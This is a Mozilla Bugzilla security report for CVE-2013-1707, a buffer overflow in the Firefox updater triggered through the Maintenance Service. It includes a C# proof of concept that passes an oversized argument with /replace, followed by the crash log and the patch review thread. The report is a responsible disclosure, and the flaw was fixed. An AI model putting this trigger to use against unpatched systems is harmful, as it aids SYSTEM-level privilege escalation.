Last Comment Bug 888314 - (CVE-2013-1707) Buffer overflow in Updater
(CVE-2013-1707)
: Buffer overflow in Updater
Status: RESOLVED FIXED
[adv-main23+][adv-esr1708+]
: csectype-bounds, csectype-priv-escalation, sec-high
Product: Toolkit
Classification: Components
Component: Application Update (show other bugs)
: 22 Branch
: x86_64 Windows 7
: -- normal (vote)
: mozilla25
Assigned To: Brian R. Bondy [:bbondy]
:
Mentors:
Depends on:
Blocks: bgupdates
  Show dependency treegraph
 
Reported: 2013-06-28 08:41 PDT by Seb Patane
Modified: 2014-11-19 20:03 PST (History)
6 users (show)
abillings: sec‑bounty+
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---
wontfix
+
verified
+
fixed
+
verified
23+
verified
unaffected


Attachments
Proof of concept source + binary (3.32 KB, application/octet-stream)
2013-06-28 08:41 PDT, Seb Patane
no flags Details
Patch v1. (2.58 KB, patch)
2013-06-28 15:32 PDT, Brian R. Bondy [:bbondy]
robert.strong.bugs: review+
lukasblakk+bugs: approval‑mozilla‑aurora+
lukasblakk+bugs: approval‑mozilla‑beta+
lukasblakk+bugs: approval‑mozilla‑esr17+
abillings: sec‑approval+
Details | Diff | Review

Description Seb Patane 2013-06-28 08:41:26 PDT
Created attachment 768974 [details]
Proof of concept source + binary

Using specially crafted arguments, an attacker can cause a buffer overflow in the updater executable (http://hg.mozilla.org/mozilla-central/file/942686767e5e/toolkit/mozapps/update/updater/updater.cpp#l2940). The maintenance service passes all arguments provided to it along to the updater, so it can be used to trigger the overflow which can potentially lead to arbitrary code execution with SYSTEM privileges.

The vulnerability occurs when the /replace flag is given along with a long callback path. C# proof-of-concept:

using System;
using System.ServiceProcess;

namespace ReplaceBufferOverflow
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                ServiceController c = new ServiceController("MozillaMaintenance");
                c.Start(new string[] {  "aaa",
                                    "software-update",
                                    @"c:\program files (x86)\Mozilla Firefox\updater.exe",
                                    @"c:\program files (x86)\Mozilla Firefox",
                                    @"c:\Program Files (x86)\Mozilla Firefox\uninstall",
                                    @"/replace",
                                    @"CCCCC",
                                    (new String('A',999))
                                     });
            }
            catch (Exception e) {
                Console.WriteLine(e);
            }
        }
    }
}


I can replicate on Windows 7 x64 with updater.exe version 22.0.0.4917 and maintenanceservice.exe version 23.0.0.4921. The result is an entry in the Windows application event log that looks similar to this:

Event ID: 1000
Faulting application name: updater.exe, version: 22.0.0.4917, time stamp: 0x51c055c9
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00410041
Faulting process id: 0x408
Faulting application start time: 0x01ce741487153860
Faulting application path: C:\Program Files (x86)\Mozilla Maintenance Service\update\updater.exe
Faulting module path: unknown
...

I have attached a compiled version of the proof-of-concept code, let me know if you need any further details.
Comment 1 Brian R. Bondy [:bbondy] 2013-06-28 15:32:44 PDT
Created attachment 769224 [details] [diff] [review]
Patch v1.
Comment 2 Brian R. Bondy [:bbondy] 2013-07-01 11:27:44 PDT
Comment on attachment 769224 [details] [diff] [review]
Patch v1.

Requesting approval to land on try, oak, and m-i.

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
A crash easily, I'm not sure how easy it is to execute something elevated.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
No comments, but the content of the patch seems somewhat obvious what it's fixing.

Which older supported branches are affected by this flaw?
All for at least 10 versions.

If not all supported branches, which bug introduced the flaw?
bug 307181 (background updates)

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
Should be the same patch everywhere.

How likely is this patch to cause regressions; how much testing does it need?
Not likely after I test on oak.
Comment 3 [On PTO until 6/29] 2013-07-01 14:17:40 PDT
Comment on attachment 769224 [details] [diff] [review]
Patch v1.

sec-approval+ for trunk. We should get this on branches well before the next release given the amount of security issues in this area recently.
Comment 5 Ryan VanderMeulen [:RyanVM] 2013-07-03 11:51:06 PDT
https://hg.mozilla.org/mozilla-central/rev/bc1a5c66674b
Comment 7 Brian R. Bondy [:bbondy] 2013-07-04 06:28:01 PDT
Comment on attachment 769224 [details] [diff] [review]
Patch v1.

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration:
User impact if declined:
It is a sec:high
A process that already has local access could potentially get elevated access.
Buffer overflow, someone could write into process memory and possibly cause it to jump to execute their own code

Bug caused by (feature/regressing bug #): 
bug 307181

Fix Landed on Version:
mozilla25

Risk to taking this patch (and alternatives if risky): 
Low

String or UUID changes made by this patch: 
None

See https://wiki.mozilla.org/Release_Management/ESR_Landing_Process for more info.
Comment 9 Matt Wobensmith [:mwobensmith][:matt:] 2013-08-05 15:13:11 PDT
Confirmed issue using 17.0.7esr, and FF22.
Confirmed fixed using 17.0.8esr candidate, FF23 candidate and today's m-c nightly.

Note You need to log in before you can comment on or make changes to this bug.